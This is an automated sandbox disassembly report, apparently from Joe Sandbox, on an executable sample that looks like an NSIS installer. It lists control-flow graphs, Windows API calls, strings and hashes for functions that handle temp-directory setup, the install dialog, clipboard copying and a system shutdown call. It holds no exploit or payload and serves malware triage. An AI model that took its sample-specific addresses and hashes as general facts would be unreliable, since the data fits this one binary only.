401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

                                                        Executed Functions

                                                        Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                        • GetClientRect.USER32(?,?), ref: 004051C2
                                                        • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                        • ShowWindow.USER32(?,00000008), ref: 00405266
                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                          • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425979,762323A0,00000000), ref: 00406902
                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                        • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                        • ShowWindow.USER32(00000000), ref: 00405313
                                                        • ShowWindow.USER32(?,00000008), ref: 00405318
                                                        • ShowWindow.USER32(00000008), ref: 0040535F
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                        • CreatePopupMenu.USER32 ref: 004053A2
                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                        • GetWindowRect.USER32(?,?), ref: 004053CA
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                        • OpenClipboard.USER32(00000000), ref: 00405437
                                                        • EmptyClipboard.USER32 ref: 0040543D
                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                        • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                        • CloseClipboard.USER32 ref: 0040549A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                        • String ID: New install of "%s" to "%s"${
                                                        • API String ID: 2110491804-1641061399
                                                        • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                        • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                        • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                        • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                        Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                        APIs
                                                        • #17.COMCTL32 ref: 004038CE
                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                        • OleInitialize.OLE32(00000000), ref: 004038E0
                                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                        • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                        • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                        • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                        • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                        • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                        • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                        • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                        • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                        • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                        • ExitProcess.KERNEL32 ref: 00403B1D
                                                        • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                        • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                        • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                        • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                        • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                        • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                        • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                        • API String ID: 2435955865-3712954417
                                                        • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                        • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                        • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                        • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                        Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                        • FindClose.KERNEL32(00000000), ref: 00406318
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID: jF
                                                        • API String ID: 2295610775-3349280890
                                                        • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                        • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                        • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                        • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                        Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                        APIs
                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                        • ShowWindow.USER32(?), ref: 00401753
                                                        • ShowWindow.USER32(?), ref: 00401767
                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                        • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                        • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                        Strings
                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                        • Aborting: "%s", xrefs: 0040161D
                                                        • Rename: %s, xrefs: 004018F8
                                                        • detailprint: %s, xrefs: 00401679
                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                        • Rename on reboot: %s, xrefs: 00401943
                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                        • Call: %d, xrefs: 0040165A
                                                        • BringToFront, xrefs: 004016BD
                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                        • Rename failed: %s, xrefs: 0040194B
                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                        • Jump: %d, xrefs: 00401602
                                                        • Sleep(%d), xrefs: 0040169D
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                        • API String ID: 2872004960-3619442763
                                                        • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                        • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                        • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                        • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                        Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                        • ShowWindow.USER32(?), ref: 004054FE
                                                        • DestroyWindow.USER32 ref: 00405512
                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                        • GetDlgItem.USER32(?,?), ref: 0040554F
                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                        • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                        • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                        • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                        • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                        • ShowWindow.USER32(00000000,?), ref: 00405756
                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                        • EnableWindow.USER32(?,?), ref: 00405783
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                        • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                        • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                        • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                        • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                        Memory Dump Source
